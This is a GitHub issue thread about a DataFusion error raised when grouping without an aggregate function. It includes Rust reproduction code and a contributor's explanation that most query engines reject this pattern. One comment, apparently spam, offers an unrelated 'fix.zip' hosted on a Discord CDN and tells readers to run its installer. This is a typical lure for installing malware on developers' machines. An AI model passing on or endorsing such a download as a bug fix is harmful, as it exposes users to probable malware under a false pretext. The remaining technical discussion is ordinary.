### ISSUE TITLE
Cannot run `group by` without aggregation function due to 'Invalid aggregate expression'

### ISSUE THREAD

**Issue by Tangeroooo** [apache/datafusion#12298]
### Describe the bug

Return an error like below message.

Error in response: DataFusionError("Internal error: Invalid aggregate expression 'Column(Column { relation: Some(Bare { table: \"?table?\" }), name: \"video_id\" })'.\nThis was likely caused by a bug in DataFusion's code and we would welcome that you file an bug report in our issue tracker")

### To Reproduce

for record_batch in reader {
        let rb = record_batch?;
    record_batches.push(rb);
}

let columns = reader.schema().fields().iter().map(|f| {
        col(f.name().clone())
    }).collect::<Vec<_>>();

let group_by_columns = group_by_columns_names
        .iter()
        .map(|name: &String| col(name))
        .collect::<Vec<_>>();

let ctx = SessionContext::new();
let df = ctx.read_batches(record_batches)?;

// select * from tab group by col1, col2;
df.aggregate(group_by_columns, columns)?.collect().await?

### Expected behavior

Run group by without aggregation function.

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by CrystalZhou0529** [comment]
Hi, I am able to verify the error you got. If I understand it correctly, your use case needs to select columns that are not included in the groupby clause and also not included in the aggregation function. Lots of query engines also do not support it.
I think it might be necessary to restructure the query in this case, and here's some reference that might be helpful: [link](https://valentina-db.com/docs/dokuwiki/v7/doku.php?id=valentina:articles:sql_selecting_from_groups) 😄

**Comment by Tangeroooo** [comment]
Hi,

Sorry for the late reply.
Yes, I need it for re-partition record batch using the "group by" by key.
But, I don't need it anymore. I implement it by myself.
If lots of engines don't support it, I agree not to handle it.

Thank you for your reply!
Let me close the issue.

Best regards,
Juhyeon Jeong.


2024년 9월 9일 (월) 오전 5:03, Crystal ***@***.***>님이 작성:
